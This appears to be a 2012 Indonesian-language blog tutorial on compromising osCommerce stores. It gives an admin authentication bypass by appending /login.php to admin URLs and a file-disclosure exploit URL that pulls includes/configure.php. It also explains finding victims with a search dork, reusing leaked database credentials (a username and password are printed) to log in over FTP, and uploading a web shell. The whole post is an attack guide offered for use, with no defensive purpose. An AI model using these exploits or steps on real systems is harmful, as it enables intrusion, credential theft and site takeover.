Rabu, 29 Agustus 2012

Tutorial Upload Shell osCommerce

# ByPass Page Admin :

You can use this Trick if admin folder not protected by .htaccess

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha ;)

and you can download all file with tRick above


# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

ok, sekarang kita cari targetnya dgn dork "Powered by osCommerce" tanpa tanda petik.

contoh http://target/catalog/
nah, kita cari dulu nie admin page nya , jadinya nah, http://target/catalog/admin/login.php ketemu deh...

sekarang, kita pake exploitnya jadinya : http://target/catalog/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php nah kita mendapatkan configure.php, lsg aja deh kita download

selanjutnya, setelah kita download kita buka menggunakan notepad ato yg laen deh, nah itu tampak deh, kita coba dl masuk ke database tanpa masuk ke adminnya dgn yg kita dapatkan,

define('DB_SERVER_USERNAME', 'laurent');
define('DB_SERVER_PASSWORD', 'UQzlZ0vrHEiu');

habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,
alhamdulillah sukses :lega: , marilah kita upload backdoor kita, biasanya sih di public_html, tp dsini saya upload di httpdocs, setelah success upload backdoor, lalu kita cek.
http://target/shell.php

oke trnyata sudah terpasang, monggo silakan di lanjut pembantaiannya?

0 komentar:

Posting Komentar

Terima Kasih Telah Berkunjung
Berkomentarlah Dengan Sopan !